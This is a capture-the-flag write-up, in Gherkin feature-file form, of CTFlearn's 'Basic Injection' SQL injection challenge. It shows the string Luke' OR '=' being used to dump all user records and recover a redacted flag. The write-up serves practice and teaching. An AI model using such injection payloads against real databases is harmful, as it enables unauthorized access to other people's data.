## Version 2.0
## language: en

Feature: Basic Injection - SQLi - ctflearn
  Site:
    https://www.ctflearn.com/
  Category:
    SQL Injection
  User:
    JuanMusic1
  Goal:
    Find the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04 LTS   |
    | Firefox         | 71.0        |
  Machine information:
    Given A link in the challenge page
    And the challenge environment
    """
    https://web.ctflearn.com/web4/
    """
    And the challenge's title is Basic Injection

  Scenario: Fail: Search users in the input
    Given The input field
    When I try input common users
    """
    flag
    admin
    password
    """
    Then I can see the message
    """
    0 results
    """
    And I couldn't get the flag

  Scenario: Success: Injecting SQL Query
    When I check the source code of the page
    Then I find out a HTML tag in comment
    """
    <!-- Try some names like Hiroki, Noah, Luke -->
    """
    And I think the flag can be extracted with any of these names
    When I try to put one name
    Then I can see the message
    """
    Name: Luke
    Data: I made this problem.
    """
    And I think the flag can be extracted with a SQLi
    When I try to put a quote with the name
    Then I see a unexpected page
    When I check with other SQLi query
    """
    Luke' OR '='
    """
    Then I find all the users
    And I see a particular user
    """
    Name: fl4g__giv3r
    Data: <FLAG>
    """
    When I put the flag in the CTFlearn flag format
    """
    CTFlearn{<FLAG>}
    """
    Then I solve the challenge
